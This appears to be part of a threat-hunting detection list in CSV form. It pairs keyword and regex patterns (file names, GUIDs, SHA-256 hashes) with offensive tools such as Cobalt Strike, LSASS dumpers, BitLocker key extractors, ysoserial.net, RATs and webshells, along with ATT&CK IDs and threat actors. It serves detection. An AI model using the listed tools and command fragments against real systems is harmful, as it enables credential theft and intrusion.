"*extract_reflective_loader*",".{0,1000}extract_reflective_loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43653"
"*ExtractBitLockerKeys*@podalirius_*",".{0,1000}ExtractBitLockerKeys.{0,1000}\@podalirius_.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43654"
"*ExtractBitlockerKeys.ps1*",".{0,1000}ExtractBitlockerKeys\.ps1.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43655"
"*ExtractBitlockerKeys.py*",".{0,1000}ExtractBitlockerKeys\.py.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43656"
"*ExtractBitlockerKeys-main*",".{0,1000}ExtractBitlockerKeys\-main.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","43657"
"*ExtractDataXML_BruteForce*",".{0,1000}ExtractDataXML_BruteForce.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","43658"
"*ExtractFileInfoViaNTDLL*",".{0,1000}ExtractFileInfoViaNTDLL.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43659"
"*ExtractFirefoxProfileData(*",".{0,1000}ExtractFirefoxProfileData\(.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","43660"
"*Extract-HijackableKeysFromProcmonCSV*",".{0,1000}Extract\-HijackableKeysFromProcmonCSV.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","43661"
"*extraction_folder*TotalRecall.txt*",".{0,1000}extraction_folder.{0,1000}TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","43662"
"*extracts the AES 128/256 keys from Policy.vpol*",".{0,1000}extracts\sthe\sAES\s128\/256\skeys\sfrom\sPolicy\.vpol.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43663"
"*extracttgsrepfrompcap.py*",".{0,1000}extracttgsrepfrompcap\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","43664"
"*extra-scripts*timecrack.py*",".{0,1000}extra\-scripts.{0,1000}timecrack\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","43665"
"*eyewitness -f urls.txt --web*",".{0,1000}eyewitness\s\-f\surls\.txt\s\-\-web.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43666"
"*-f BinaryFormatter -g PSObject -o base64 -c *",".{0,1000}\-f\sBinaryFormatter\s\-g\sPSObject\s\-o\sbase64\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","43667"
"*-f Json.Net -g ObjectDataProvider -o raw -c *",".{0,1000}\-f\sJson\.Net\s\-g\sObjectDataProvider\s\-o\sraw\s\-c\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","43668"
"*-f payloads_examples/calc.*",".{0,1000}\-f\spayloads_examples\/calc\..{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","43669"
"*f:\temp\pass.html*",".{0,1000}f\:\\temp\\pass\.html.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43670"
"*f:\temp\passwords.html*",".{0,1000}f\:\\temp\\passwords\.html.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","43671"
"*F0005D08-6278-4BFE-B492-F86CCEC797D5*",".{0,1000}F0005D08\-6278\-4BFE\-B492\-F86CCEC797D5.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","43672"
"*f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49*",".{0,1000}f0037d99bc3119fc613d304af20599e8c791b1c99208d5d452a01738777f7b49.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#filehash","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","43673"
"*F00A3B5F-D9A9-4582-BBCE-FD10EFBF0C17*",".{0,1000}F00A3B5F\-D9A9\-4582\-BBCE\-FD10EFBF0C17.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#GUIDproject","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","43676"
"*f01d1e178abb9200266fd816ec512b33f5f1b76f8d5d3953678c42003e526692*",".{0,1000}f01d1e178abb9200266fd816ec512b33f5f1b76f8d5d3953678c42003e526692.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","43678"
"*f02faf2b5816db6bd67fdbe432b87ad6c9e2d79a7251e81a0c9acd3d8dd28bba*",".{0,1000}f02faf2b5816db6bd67fdbe432b87ad6c9e2d79a7251e81a0c9acd3d8dd28bba.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43680"
"*f036df2efba311e876debab785e546149cb15021ffa32294faea444ae499561e*",".{0,1000}f036df2efba311e876debab785e546149cb15021ffa32294faea444ae499561e.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43681"
"*f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117*",".{0,1000}f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","#filehash","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","43682"
"*f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117*",".{0,1000}f038fdbc3ed50ebbf1ebc1c814836bcf93b4c149e5856ccf9b5400da8a974117.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","0","#filehash","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","43683"
"*f0421fe369c03c1172e8f88730dbb20e427673c878d37a63a192dccca0be5d93*",".{0,1000}f0421fe369c03c1172e8f88730dbb20e427673c878d37a63a192dccca0be5d93.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43684"
"*f049f7c98172f7696d6a0b312c91010720970f825eb4cff5c76c151e15f16951*",".{0,1000}f049f7c98172f7696d6a0b312c91010720970f825eb4cff5c76c151e15f16951.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","#filehash","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","43688"
"*f04a52623464ec2eb52b22e7348993bf5b7456714505f87342781b8d21c7233c*",".{0,1000}f04a52623464ec2eb52b22e7348993bf5b7456714505f87342781b8d21c7233c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","43689"
"*f04b79d7179c98ce705876849a20f67bcff5c977f4f7865226e26296f1e80966*",".{0,1000}f04b79d7179c98ce705876849a20f67bcff5c977f4f7865226e26296f1e80966.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43690"
"*f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff*",".{0,1000}f04f854c5bbfa8a33358efd2bb3e700e9be687250548a1cb21de1d661b5f04ff.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","43691"
"*f05885a68c1f16c7cbaa3657bbc57f54b7755910d1c96366543cc428729abcb3*",".{0,1000}f05885a68c1f16c7cbaa3657bbc57f54b7755910d1c96366543cc428729abcb3.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#filehash","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","43694"
"*f05e2bbc6da71e91b59512e9f50219dd6852481d52cca02a0b780dd29ce52fb7*",".{0,1000}f05e2bbc6da71e91b59512e9f50219dd6852481d52cca02a0b780dd29ce52fb7.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","43696"
"*f05ff84ba4bb193182883786c635cac0643b51d7046cedfc48c352ca415d348a*",".{0,1000}f05ff84ba4bb193182883786c635cac0643b51d7046cedfc48c352ca415d348a.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","43697"
"*F06EAC7B-6996-4E78-B045-0DF6ED201367*",".{0,1000}F06EAC7B\-6996\-4E78\-B045\-0DF6ED201367.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","#GUIDproject","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","43700"
"*f06f0e1867889b5f70cbb8e9050d25b8801c15b93fe4b6a4d00841c6666ab0a6*",".{0,1000}f06f0e1867889b5f70cbb8e9050d25b8801c15b93fe4b6a4d00841c6666ab0a6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43701"
"*f0761ad307781bdf8da94765abd1a2041ac12a52c7fdde85f00b2b2cab6d6ce8*",".{0,1000}f0761ad307781bdf8da94765abd1a2041ac12a52c7fdde85f00b2b2cab6d6ce8.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","43703"
"*f079fee94bbb57fd41bab9139839f5458137b0a8bcd692642f22f08ce647cae2*",".{0,1000}f079fee94bbb57fd41bab9139839f5458137b0a8bcd692642f22f08ce647cae2.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","43704"
"*f086a7ee9ea8f85d34a9dada68c8a885ca4222b97ab568e2b5397e09eece98bc*",".{0,1000}f086a7ee9ea8f85d34a9dada68c8a885ca4222b97ab568e2b5397e09eece98bc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43705"
"*f0879a3367e156039b9f4c2b34fb0b6b02805d2ac74c7bd0dbf4b97f97b41411*",".{0,1000}f0879a3367e156039b9f4c2b34fb0b6b02805d2ac74c7bd0dbf4b97f97b41411.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43706"
"*f089979c1b33e75e2819d1fe15e8b50dafe0c075a5ad3f98207b51bfdff69c77*",".{0,1000}f089979c1b33e75e2819d1fe15e8b50dafe0c075a5ad3f98207b51bfdff69c77.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43707"
"*f09a777ff1bb221184f60cea61e092b51b096f25cfe5650d84516c09013233a6*",".{0,1000}f09a777ff1bb221184f60cea61e092b51b096f25cfe5650d84516c09013233a6.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43709"
"*f09d817e9523c32b31b29f2b6de48358e14b767d3f27709186f8629f35c991d2*",".{0,1000}f09d817e9523c32b31b29f2b6de48358e14b767d3f27709186f8629f35c991d2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","43710"
"*f0a08cae1d8aaea09f48e99965a1ea070de40ddc75830112cfa46f5c37c26306*",".{0,1000}f0a08cae1d8aaea09f48e99965a1ea070de40ddc75830112cfa46f5c37c26306.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43711"
"*F0A581F1-D9BE-42EB-B262-E6A7CC839D2B*",".{0,1000}F0A581F1\-D9BE\-42EB\-B262\-E6A7CC839D2B.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43713"
"*f0aad423001bc47bc3b1242f8cef69109262c413f151d5cf212cdd2dc341ceb3*",".{0,1000}f0aad423001bc47bc3b1242f8cef69109262c413f151d5cf212cdd2dc341ceb3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43714"
"*f0b1a06aa6d5ea27814565755c6bfe2520dd71c4df02768fe7d621c3c3d0db75*",".{0,1000}f0b1a06aa6d5ea27814565755c6bfe2520dd71c4df02768fe7d621c3c3d0db75.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","43715"
"*f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2*",".{0,1000}f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43717"
"*f0d60a0c31f6aaa68c096553a8b983f2c9c78c96022118d1e1066012ec9c3268*",".{0,1000}f0d60a0c31f6aaa68c096553a8b983f2c9c78c96022118d1e1066012ec9c3268.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","43721"
"*f0d99239fa828a18f0756ec717a663b5e64af9cf4e4130ec0a27bdf5d592ac96*",".{0,1000}f0d99239fa828a18f0756ec717a663b5e64af9cf4e4130ec0a27bdf5d592ac96.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","43722"
